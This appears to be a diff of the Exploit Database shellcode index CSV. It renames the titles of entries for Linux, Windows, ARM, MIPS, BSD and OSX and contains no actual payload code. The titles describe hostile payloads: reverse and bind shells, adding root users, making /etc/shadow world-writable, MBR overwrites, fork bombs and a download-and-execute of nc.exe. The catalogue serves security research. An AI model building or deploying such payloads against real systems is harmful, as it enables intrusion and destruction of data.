13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
@ -291,7 +292,7 @@ id,file,description,date,author,type,platform
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
@ -302,22 +303,22 @@ id,file,description,date,author,type,platform
13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86
13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,linux_x86
13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
@ -331,21 +332,21 @@ id,file,description,date,author,type,platform
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86
13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86
13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86
13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
@ -357,12 +358,12 @@ id,file,description,date,author,type,platform
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
@ -381,29 +382,29 @@ id,file,description,date,author,type,platform
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14234,shellcodes/linux/14234.c,"Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows
15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
@ -412,15 +413,15 @@ id,file,description,date,author,type,platform
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
@ -428,19 +429,19 @@ id,file,description,date,author,type,platform
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
@ -461,7 +462,7 @@ id,file,description,date,author,type,platform
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
